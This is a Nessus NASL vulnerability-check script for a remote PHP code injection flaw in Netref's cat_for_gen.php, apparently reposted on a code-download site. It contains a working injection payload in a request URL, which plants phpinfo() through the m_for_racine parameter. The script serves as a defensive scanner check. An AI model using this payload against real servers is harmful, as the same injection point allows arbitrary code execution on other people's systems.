⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 netref_cat_for_gen.nasl

📁 漏洞扫描源码,可以扫描linux,windows,交换机路由器
💻 NASL
字号:
## This script was written by Josh Zlatin-Amishav <josh at tkos dot co dot il>## Fixed by Tenable:#  - Improved description#  - Streamlined code.#  - Improved exploit.## This script is released under the GNU GPLv2#if(description){ script_id(18358); script_bugtraq_id(13275); script_version ("$Revision: 38 $"); name["english"] = "Netref Cat_for_gen.PHP Remote PHP Script Injection Vulnerability"; script_name(english:name["english"]); desc["english"] = "The remote host is running the Netref directory script, written inPHP. There is a vulnerability in the installed version of Netref thatenables a remote attacker to pass arbitrary PHP script code throughthe 'ad', 'ad_direct', and 'm_for_racine' parameters of the'cat_for_gen.php' script.  This code will be executed on the remotehost under the privileges of the web server userid. Solution : Upgrade to Netref 4.3 or later.Risk factor : High"; script_description(english:desc["english"]); summary["english"] = "Netref Cat_for_gen.PHP Remote PHP Script Injection Vulnerability"; script_summary(english:summary["english"]); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"Copyright (C) 2005 Josh Zlatin-Amishav"); script_dependencies("http_version.nasl"); script_require_ports("Services/www", 80); script_exclude_keys("Settings/disable_cgi_scanning"); exit(0);}include("http_func.inc");include("http_keepalive.inc");port = get_http_port(default:80);if(!get_port_state(port))exit(0);if (!can_host_php(port:port)) exit(0);function check(url){ # Try to call PHP's phpinfo() function. req = http_get(item:url +"/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=%3C/option%3E%3C/SELECT%3E%3C?phpinfo();?%3E", port:port); res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE); if ( res == NULL ) exit(0); if ( "PHP Version" >< res ) {        security_hole(port);        exit(0); }}foreach dir ( cgi_dirs() ){  check(url:dir);}

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -